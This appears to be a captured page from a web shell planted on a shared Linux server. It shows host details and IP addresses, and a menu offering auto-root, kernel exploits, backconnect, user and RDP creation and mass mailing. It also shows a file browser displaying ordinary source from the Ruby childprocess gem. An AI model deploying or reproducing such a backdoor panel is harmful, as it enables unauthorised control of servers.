Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
childprocess /
[ HOME SHELL ]
Name
Size
Permission
Action
jruby
[ DIR ]
drwxr-xr-x
tools
[ DIR ]
drwxr-xr-x
unix
[ DIR ]
drwxr-xr-x
windows
[ DIR ]
drwxr-xr-x
abstract_io.rb
492
B
-rw-r--r--
abstract_process.rb
3.54
KB
-rw-r--r--
errors.rb
966
B
-rw-r--r--
jruby.rb
1.12
KB
-rw-r--r--
unix.rb
207
B
-rw-r--r--
version.rb
44
B
-rw-r--r--
windows.rb
861
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jruby.rb
require 'java' require 'jruby' class Java::SunNioCh::FileChannelImpl field_reader :fd end class Java::JavaIo::FileDescriptor if ChildProcess.os == :windows field_reader :handle end field_reader :fd end module ChildProcess module JRuby def self.posix_fileno_for(obj) channel = ::JRuby.reference(obj).channel begin channel.getFDVal rescue NoMethodError fileno = channel.fd if fileno.kind_of?(Java::JavaIo::FileDescriptor) fileno = fileno.fd end fileno == -1 ? obj.fileno : fileno end rescue # fall back obj.fileno end def self.windows_handle_for(obj) channel = ::JRuby.reference(obj).channel fileno = obj.fileno begin fileno = channel.getFDVal rescue NoMethodError fileno = channel.fd if channel.respond_to?(:fd) end if fileno.kind_of? Java::JavaIo::FileDescriptor fileno.handle else Windows::Lib.handle_for fileno end end end end require "childprocess/jruby/pump" require "childprocess/jruby/io" require "childprocess/jruby/process"
Close